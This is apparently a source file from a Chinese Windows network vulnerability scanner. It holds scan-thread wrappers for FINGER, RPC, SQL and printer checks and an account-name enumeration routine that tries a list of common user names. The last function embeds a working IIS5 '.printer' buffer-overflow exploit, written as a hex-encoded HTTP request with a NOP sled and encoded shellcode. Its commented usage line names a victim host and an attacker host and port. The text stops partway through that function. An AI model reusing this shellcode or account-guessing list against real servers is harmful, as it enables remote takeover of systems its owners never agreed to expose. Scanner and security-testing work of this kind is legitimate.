
📄 网络评估view.cpp

📁 支持常见网络漏洞的扫描.有CVS的漏洞数据库,界面友好,使用方便.
		p->m_wndStatusBar.SetPaneText(2,str);
		p->m_wndStatusBar.Invalidate();
	}
	pView->stopupdate();//停止动画
	return 0;
}
/*
 * Thread-procedure-shaped entry point (UINT f(LPVOID)) for the FINGER check.
 *
 * lParam is cast to the owning CMyView. FingerScan() is called with the
 * view's m_destIp; the text it produces is appended to the view, the
 * " FINGER" row is updated with view->bright or view->bwrong depending on
 * the result, and the view's animation is stopped. Always returns 0.
 */
UINT fingerScan(LPVOID lParam)
{
	CMyView *view = (CMyView *)lParam;
	CString report;

	// Only an exact TRUE is treated as a match; other non-zero values are not.
	const BOOL outcome = FingerScan(view->m_destIp, report, view->m_stringFinger);
	const bool matched = (outcome == TRUE);
	view->AddString(report);

	if (matched) {
		view->updatelist(view->m_checkFingernum, " FINGER", view->bright);
	} else {
		view->updatelist(view->m_checkFingernum, " FINGER", view->bwrong);
	}

	CMainFrame *frame = (CMainFrame *)AfxGetApp()->GetMainWnd();
	if (matched) {
		// NOTE(review): view->wrong is not incremented here and fills both
		// %d fields, so the pane always reads "N/N" — confirm the intended
		// numerator and denominator.
		CString paneText;
		paneText.Format(" 当前扫描系统漏洞数:    %d/%d", view->wrong, view->wrong);
		frame->m_wndStatusBar.SetPaneText(2, paneText);
		frame->m_wndStatusBar.Invalidate();
	}

	view->stopupdate(); // stop the animation
	return 0;
}
/*
 * Thread-procedure-shaped entry point (UINT f(LPVOID)) for the RPC check.
 *
 * lParam is cast to the owning CMyView. RpcScan() is called with the view's
 * m_destIp; the text it produces is appended to the view, the " RPC" row is
 * updated with view->bright or view->bwrong depending on the result, and
 * the view's animation is stopped. Always returns 0.
 */
UINT rpcScan(LPVOID lParam)
{
	CMyView *view = (CMyView *)lParam;
	CString report;

	// Only an exact TRUE is treated as a match; other non-zero values are not.
	const BOOL outcome = RpcScan(view->m_destIp, report, view->m_stringRPC);
	const bool matched = (outcome == TRUE);
	view->AddString(report);

	if (matched) {
		view->updatelist(view->m_checkRPCnum, " RPC", view->bright);
	} else {
		view->updatelist(view->m_checkRPCnum, " RPC", view->bwrong);
	}

	CMainFrame *frame = (CMainFrame *)AfxGetApp()->GetMainWnd();
	if (matched) {
		// NOTE(review): view->wrong is not incremented here and fills both
		// %d fields, so the pane always reads "N/N" — confirm the intended
		// numerator and denominator.
		CString paneText;
		paneText.Format(" 当前扫描系统漏洞数:    %d/%d", view->wrong, view->wrong);
		frame->m_wndStatusBar.SetPaneText(2, paneText);
		frame->m_wndStatusBar.Invalidate();
	}

	view->stopupdate(); // stop the animation
	return 0;
}
/*
 * Thread-procedure-shaped entry point (UINT f(LPVOID)) for the SQL check.
 *
 * lParam is cast to the owning CMyView. SQLScan() is called with the view's
 * m_destIp; the text it produces is appended to the view and the " SQL" row
 * is updated with view->bright or view->bwrong depending on the result.
 * On a match the status-bar pane is refreshed and every entry of
 * view->m_stringSQL is handed to view->getwrongtype(). Always returns 0.
 */
UINT sql_saScan(LPVOID lParam)
{
	CMyView *view = (CMyView *)lParam;
	CString report;

	// Only an exact TRUE is treated as a match; other non-zero values are not.
	const BOOL outcome = SQLScan(view->m_destIp, report, view->m_stringSQL);
	const bool matched = (outcome == TRUE);
	view->AddString(report);

	if (matched) {
		view->updatelist(view->m_checkSQLnum, " SQL", view->bright);
	} else {
		view->updatelist(view->m_checkSQLnum, " SQL", view->bwrong);
	}

	CMainFrame *frame = (CMainFrame *)AfxGetApp()->GetMainWnd();
	if (matched) {
		// NOTE(review): view->wrong is not incremented here and fills both
		// %d fields, so the pane always reads "N/N" — confirm the intended
		// numerator and denominator.
		CString paneText;
		paneText.Format(" 当前扫描系统漏洞数:    %d/%d", view->wrong, view->wrong);
		frame->m_wndStatusBar.SetPaneText(2, paneText);
		frame->m_wndStatusBar.Invalidate();

		// Walk the finding list from its head; the element count is
		// re-read on every pass.
		POSITION cursor = view->m_stringSQL.GetHeadPosition();
		if (cursor != NULL) {
			for (int idx = 0; idx < view->m_stringSQL.GetCount(); ++idx) {
				view->getwrongtype(view->m_stringSQL.GetAt(cursor));
				view->m_stringSQL.GetNext(cursor);
			}
		}
	}

	view->stopupdate(); // stop the animation
	return 0;
}
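/*
 * Thread-procedure-shaped entry point (UINT f(LPVOID)) for the account-name
 * check.
 *
 * lParam is cast to the owning CMyView. A "\\<m_destIp>" host string is
 * built, then user2sid() is called once per entry of a fixed candidate list
 * with argc = 2, that host string, the candidate name and the view. When the
 * list is exhausted the function sleeps one second, signals fEvent and
 * updates the " USERS" row with status value 2. Always returns 0.
 *
 * NOTE(review): user2sid(), when called with argc == 2, passes NULL as the
 * system name to LookupAccountName, so the names are resolved by the machine
 * running this program; the host string built here does not influence the
 * lookup. Results written to the report should be read with that in mind.
 */
UINT ntuserScan(LPVOID lParam)
{
	CMyView *pView = (CMyView *)lParam;

	// Plain string literals instead of an array of CString objects: nothing
	// is constructed per call and no class object is passed through "...".
	static const char *const kCandidates[] = {
		"webmaster","master","www","web","sybase","oracle","informix",
		"Abc123","sam_exec","+","oracle8","access","users","ftp",
		"account","backup","owc","datebase","public","info",
		"wais","news","bbs","adm","sync","john","sports","china","ADMINISTRATOR",
		"GUEST","BACKUP","ROOT","ADMIN","USER","DEMO","TEST","SYSTEM","OPERATOR","OPER","LOCAL"
	};
	const int kCandidateCount = (int)(sizeof(kCandidates) / sizeof(kCandidates[0]));

	char host[100] = "";
	char account[100] = "";

	// Bounded formatting: an over-long m_destIp is truncated instead of
	// running past the 100-byte buffer.
	// Assumes m_destIp is a CString or a character buffer — TODO confirm
	// against the CMyView declaration.
	_snprintf(host, sizeof(host) - 1, "\\\\%s", (LPCTSTR)pView->m_destIp);
	host[sizeof(host) - 1] = '\0';

	pView->AddString("NT服务器的USER的SID:");

	pView->AddString("尝试利用USER2SID命令获得目标机上存在的一些常见用户名:");

	pView->AddString("开始调入用户名列表--------");
	for (int i = 0; i < kCandidateCount; ++i) {
		// user2sid() takes non-const char*, so hand it a private copy;
		// lstrcpynA always NUL-terminates within the given size.
		lstrcpynA(account, kCandidates[i], (int)sizeof(account));
		user2sid(2, host, account, pView);
		Sleep(1);
	}

	Sleep(1000);
	fEvent.SetEvent();
	pView->updatelist(pView->m_checkUsersnum, " USERS", 2);
	return 0;
}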
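/*
 * Resolve an account name with LookupAccountName() and append the result
 * (sub-authority list, domain, SID length, SID type) to the view as text.
 *
 * argc    must be 2; any other value makes the function return at once.
 * argv0   host string supplied by the caller. It is not used: the lookup
 *         passes NULL as the system name, so the name is resolved by the
 *         machine running this program.
 * argv1   account name to look up.
 * lParam  the CMyView that receives the output lines.
 *
 * Always returns 0; success or failure is visible only in the text added to
 * the view.
 */
int user2sid(int argc,char *argv0,char *argv1,LPVOID lParam)
{
	CMyView *pView = (CMyView *)lParam;
	if (argc != 2 || argv1 == NULL || pView == NULL)
	{
		return 0;
	}
	(void)argv0;

	pView->AddString("测试用户名:");
	pView->AddString(argv1);

	// DWORD-typed storage keeps the SID buffer suitably aligned.
	DWORD sidStorage[512];
	PSID sid = sidStorage;

	// Each in/out size gets its own variable: the API writes the SID size
	// and the domain-name length back independently, and the domain length
	// is counted in characters, not bytes.
	DWORD cbSid = sizeof(sidStorage);
	TCHAR domain[1024] = {0};
	DWORD cchDomain = sizeof(domain) / sizeof(domain[0]);

	// A real SID_NAME_USE object rather than a reinterpreted byte array.
	SID_NAME_USE use = SidTypeUnknown;

	if (!LookupAccountName(NULL, argv1, sid, &cbSid, domain, &cchDomain, &use))
	{
		pView->AddString("LookupAccountName failed - no such account") ;
		return 0;
	}

	// Accumulate "-<value>" for every sub-authority in a CString; appending
	// with strcat() to a string literal would write into read-only storage.
	CString subAuthorities;
	const int n = *GetSidSubAuthorityCount(sid);
	for (int i = 0; i < n; ++i)
	{
		CString part;
		// Sub-authorities are unsigned 32-bit values; %lu keeps large ones
		// from being printed as negative numbers.
		part.Format("-%lu", (unsigned long)*GetSidSubAuthority(sid, i));
		subAuthorities += part;
	}

	CString str1, str2, str3, str4;

	// NOTE(review): the line labelled "Number of subauthorities" carries the
	// dash-separated sub-authority values, not the count n, and the
	// identifier authority is not part of the output — confirm the intended
	// report format.
	// The explicit LPCTSTR cast avoids passing a CString object through "...".
	str1.Format("Number of subauthorities is %s", (LPCTSTR)subAuthorities);

	char domainOem[sizeof(domain)] = {0};
	CharToOem(domain, domainOem);
	str2.Format("Domain is %s", domainOem);

	str3.Format("Length of SID in memory is %d bytes", GetLengthSid(sid));

	const char *typeText;
	switch (use)
	{
	case SidTypeUser:
		typeText = "SidTypeUser";
		break;
	case SidTypeGroup:
		typeText = "SidTypeGroup";
		break;
	case SidTypeDomain:
		typeText = "SidTypeDomain";
		break;
	case SidTypeAlias:
		typeText = "SidTypeAlias";
		break;
	case SidTypeWellKnownGroup:
		typeText = "SidTypeWellKnownGroup";
		break;
	case SidTypeDeletedAccount:
		typeText = "SidTypeDeletedAccount";
		break;
	case SidTypeInvalid:
		typeText = "SidTypeInvalid";
		break;
	default:
		typeText = "SidTypeUnknown";
		break;
	}
	str4.Format("Type of SID is %s", typeText);

	pView->AddString(str1);
	pView->AddString(str2);
	pView->AddString(str3);
	pView->AddString(str4);
	return 0;
}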
/*
 * Thread-procedure-shaped entry point (UINT f(LPVOID)) for the PRINTER check.
 *
 * lParam is cast to the owning CMyView. PrinterScan() is called with the
 * view's m_destIp; the text it produces is appended to the view and the
 * " PRINTER" row is updated with view->bright or view->bwrong depending on
 * the result. On a match the status-bar pane is refreshed and every entry
 * of view->m_stringPrinter is handed to view->getwrongtype().
 * Always returns 0.
 */
UINT printerScan(LPVOID lParam)
{
	CMyView *view = (CMyView *)lParam;
	CString report;

	// Only an exact TRUE is treated as a match; other non-zero values are not.
	const BOOL outcome = PrinterScan(view->m_destIp, report, view->m_stringPrinter);
	const bool matched = (outcome == TRUE);
	view->AddString(report);

	if (matched) {
		view->updatelist(view->m_checkPrinternum, " PRINTER", view->bright);
	} else {
		view->updatelist(view->m_checkPrinternum, " PRINTER", view->bwrong);
	}

	CMainFrame *frame = (CMainFrame *)AfxGetApp()->GetMainWnd();
	if (matched) {
		// NOTE(review): view->wrong is not incremented here and fills both
		// %d fields, so the pane always reads "N/N" — confirm the intended
		// numerator and denominator.
		CString paneText;
		paneText.Format(" 当前扫描系统漏洞数:    %d/%d", view->wrong, view->wrong);
		frame->m_wndStatusBar.SetPaneText(2, paneText);
		frame->m_wndStatusBar.Invalidate();

		// Walk the finding list from its head; the element count is
		// re-read on every pass.
		POSITION cursor = view->m_stringPrinter.GetHeadPosition();
		if (cursor != NULL) {
			for (int idx = 0; idx < view->m_stringPrinter.GetCount(); ++idx) {
				view->getwrongtype(view->m_stringPrinter.GetAt(cursor));
				view->m_stringPrinter.GetNext(cursor);
			}
		}
	}

	view->stopupdate(); // stop the animation
	return 0;
}
int printer_main(int argc, char argv[][100],LPVOID lParam){
   CMyView*pView=(CMyView*)lParam;
   pView->AddString("远程打印漏洞...");
/* the whole request rolled into one, pretty huh? carez. */

char sploit[]=
"\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20"
"\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x61\x76\x75\x68\x3a\x20"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
"\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
"\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";

        int                     s;
        unsigned short int      a_port;
        unsigned long           a_host;
        struct hostent          *ht;
        struct sockaddr_in      sin;
		#ifdef WIN32
		WSADATA WSAData;
		if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0) {
			 pView->AddString("WSAStartup failed.");
			WSACleanup();
			return 0;
		}
        #endif

         pView->AddString("iis5 remote printer overflow.");
        pView->m_stringPrinter.AddTail("iis5 打印机溢出");     

		if (argc != 5) {
        //printf("usage: %s <victimHost> <victimPort> <attackerHost> <attackerPort>\n",argv[0]);
        return 0;
